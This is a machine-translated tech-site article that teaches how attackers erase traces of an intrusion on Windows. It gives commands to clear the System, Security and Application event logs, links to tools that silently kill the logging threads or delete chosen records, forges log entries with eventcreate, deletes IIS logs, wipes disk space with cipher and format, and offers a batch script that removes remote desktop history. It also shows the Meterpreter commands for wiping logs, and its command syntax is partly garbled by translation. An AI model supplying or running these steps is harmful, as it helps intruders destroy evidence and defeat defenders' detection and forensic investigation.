Shulou(Shulou.com)06/01 Report--

Windows invasion trace cleaning skills, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

In order to avoid intrusion, attackers always hide themselves in a variety of ways, such as hiding their real IP, clearing system logs, deleting uploaded tools, hiding backdoor files, erasing traces generated in the intrusion process, and so on.

01. Windows log clear

Windows log path:

System log:% SystemRoot%\ System32\ Winevt\ Logs\ System.evtx security log:% SystemRoot%\ System32\ Winevt\ Logs\ Security.evtx application log:% SystemRoot%\ System32\ Winevt\ Logs\ Application.evtx

The key for the log in the registry: HKEY_LOCAL_MACHINE\ system\ CurrentControlSet\ Services\ Eventlog

How to clear windows logs:

(1) the simplest and roughest way

To start the → run, enter eventvwr to enter the event viewer, and select clear log in the right column.

(2) one click on the command line to clear the Windows event log

PowerShell-Command "& {Clear-Eventlog-Log Application,System,Security}"

Get-WinEvent-ListLog Application,Setup,Security-Force |% {Wevtutil.exe cl $_ .Logname}

(3) use script to stop log recording

This script traverses the thread stack of the event log service process (dedicated svchost.exe) and identifies the event log thread to kill the event log service thread.

As a result, the system will not be able to collect logs, and the event logging service appears to be running.

Github project address: https://github.com/hlldz/Invoke-Phant0m

(4) Windows single log clear

This tool is mainly used to delete specified records from the Windows event log.

Github project address: https://github.com/QAX-A-Team/EventCleaner

(5) falsification of Windows logs

Use eventcreate as a command line tool to fake logs or overwrite existing logs with custom spam.

Eventcreate-l system-so administrator-t warning-d "this is a test"-id 500

02, IIS log

IIS default log path:

% SystemDrive%\ inetpub\ logs\ LogFiles\ W3SVC1\

Clear the WWW log:

Stop the service: net stop w3svc deletes all files in the log directory: del *. * enable service: net start w3svc

03. Use Windows's own command for secure erasure

(1) permanent deletion of Shift+Delete shortcut key

Delete files directly, can still be found in the Recycle Bin, use the Shift+Delete shortcut key can be deleted directly and permanently. However, with the data recovery software, the deleted files can be restored as soon as possible, otherwise it will be difficult to restore the new files if they overwrite the traces of the original files.

(2) Cipher command is overwritten many times.

After deleting the file, you can use the Cipher command to write other data repeatedly to cover the hard disk space of the deleted file through the / W parameter, and completely delete the data to prevent it from being restored.

For example, delete the files in the D:\ tools directory, and then execute this command:

Cipher / WRV D:\ tools

In this way, the unused space on disk D will be overwritten three times: one 0x00, one 0xFF, and one random number, and all deleted files cannot be recovered.

(3) Format command overrides formatting

When the / P parameter is added to the Format command, each sector is cleared to zero and then overwritten with a random number. And it can be covered multiple times. For example:

Format D: / P:8

This command indicates that disk D is overwritten 8 times with a random number.

04. Clear remote Desktop connection record

When another client or server is connected remotely through this machine, the remote desktop connection record is kept on the local computer. The code is saved as a clear.bat file, and double-click to run can automatically clear the remote desktop connection record.

@ echo offreg delete "HKEY_CURRENT_USER\ Software\ Microsoft\ Terminal Server Client\ Default" / va / freg delete "HKEY_CURRENT_USER\ Software\ Microsoft\ Terminal Server Client\ Servers" / freg add "HKEY_CURRENT_USER\ Software\ Microsoft\ Terminal Server Client\ Servers" cd% userprofile%\ documents\ attrib Default.rdp-s-hdel Default.rdp

05. Metasploit trace removal

(1) View the event log

Meterpreter > run event_manager-I [*] Retriving Event Log Configuration

Event Logs on System=

Name Retention Maximum Size Records-Application Disabled 20971520K 2149 HardwareEvents Disabled 20971520K 0 Internet Explorer Disabled K 0 Key Management Service Disabled 20971520K 0 Security Disabled 20971520K 1726 System Disabled 20971520K 3555 Windows PowerShell Disabled 15728640K 138 (2) clear event log (including six log types) meterpreter > run event_manager-c

(3) alternatively, you can enter the clearv command to clear the event log of the target system (including only three log types)

Meterpreter > clearev [*] Wiping 4 records from Application... [*] Wiping 8 records from System... [*] Wiping 7 records from Security... Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.